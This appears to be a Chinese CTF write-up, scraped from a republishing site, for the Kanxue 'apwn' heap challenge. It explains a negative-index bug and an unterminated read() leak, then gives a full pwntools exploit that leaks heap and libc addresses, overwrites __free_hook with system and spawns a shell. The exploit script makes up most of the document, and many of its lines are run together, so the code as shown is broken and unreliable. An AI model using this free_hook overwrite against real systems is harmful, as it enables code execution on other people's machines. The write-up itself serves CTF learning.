本文主要是介绍看雪CTF 拯救单身狗 apwn,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
漏洞类型
堆的整数负数溢出
保护机制
全保护
关键代码
if ( two[v1] )//没考虑负数{puts("Oh,singledog,changing your name can bring you good luck.");read(0, (void *)two[v1], 0x20uLL);printf("new name: %s", two[v1]);}
if ( one[v1] )//同样没考虑负数{puts("Oh,luckydog,What is your new name?");read(0, (void *)(one[v1] + 8LL), 0x18uLL);puts("your partner's new name");read(0, *(void **)one[v1], 0x20uLL);}
只考虑是否有效,没考虑int 整型的v1是否为负数。造成整数溢出。
而且read输入后没有\x00截断,给Leak形成条件
利用思路
1、利用read没有截断leak出libc和堆地址
2、改free_hook为system('/bin/sh')
EXP
from pwn import *
context.os='Linux'
context.arch='amd64'
debug = 1
if debug:context.log_level='debug'cn=process('./apwn')#cn=process('./the_end',env={'LD_PRELOAD':'./lib/i386-linux-gnu/libc-2.23.so'})elf=ELF('./apwn')libc=elf.libc#libc = ELF('/lib/i386-linux-gnu/libc-2.23.so')#libc = ELF('./libc6-i386_2.23-0ubuntu10_amd64.so')s = lambda data :cn.send(str(data))
sa = lambda delim,data :cn.sendafter(str(delim), str(data))
st = lambda delim,data :cn.sendthen(str(delim), str(data))
sl = lambda data :cn.sendline(str(data))
sla = lambda delim,data :cn.sendlineafter(str(delim), str(data))
r = lambda numb=4096 :cn.recv(numb)
rl = lambda :cn.recvline()
ru = lambda delims :cn.recvuntil(delims)
irt = lambda :cn.interactive()
uu32 = lambda data :u32(data.ljust(4, '\0'))
uu64 = lambda data :u64(data.ljust(8, '\0'))
def create_luckydog(name,partner):ru('>>')sl(2)s(name)ru("your partner's name")s(partner)
def create_singledog(name):ru('>>')sl(1)s(name)
def edit_singledog(index,name):ru('>>')sl(3)sl(index)#ru('Oh,singledog,changing your name can bring you good luck.')s(name)
def edit_luckydog(index,name,partner):ru('>>')sl(4)sl(index)s(name)s(partner)
def dele():ru('>>')sl(5)create_singledog('/bin/sh\x00'+'\x00'*0x18)#two[0]
create_luckydog('b'*0x18,'c'*0x20)#one[0]
create_singledog('/bin/sh\x00')#two[1]
create_luckydog('e'*0x18,'f'*0x20)#one[1]#leak heap
dele()
dele()
create_singledog('\x30')
edit_singledog(0,'\x30')
ru('new name: ')
heap = uu64(r(6))-0x30
success('heap= {}'.format(hex(heap)))#leak start
'''
edit_singledog(-11,'\x08')
ru('new name: ')
start = uu64(r(6))-0x202008
success('start= {}'.format(hex(start)))
'''
#leak libcedit_singledog(-11,'\x20')
ru('new name: ')
libc_base = uu64(r(6))-libc.symbols['_IO_2_1_stdout_']#0x3c5620success('libc_base= {}'.format(hex(libc_base)))'''
edit_singledog(-4,'11111111')
ru('11111111')
#gdb.attach(cn)
libc_base = uu64(r(6))-0x3ec703 #remote
'''
success('libc_base= {}'.format(hex(libc_base)))
#write free_hook
free_hook=libc_base+libc.symbols['__free_hook']
sys=libc_base+libc.symbols['system']
success('free_hook= {}'.format(hex(free_hook)))
success('system= {}'.format(hex(sys)))
edit_singledog(80,p64(free_hook))
edit_luckydog(0,'a'*0x18,p64(sys)+'\x00'*0x18)edit_singledog(80,p64(heap+0x100))
edit_luckydog(0,'a'*0x18,'/bin/sh\x00'+'\x00'*0x18)#gdb.attach(cn)
dele()irt()
这篇关于看雪CTF 拯救单身狗 apwn的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!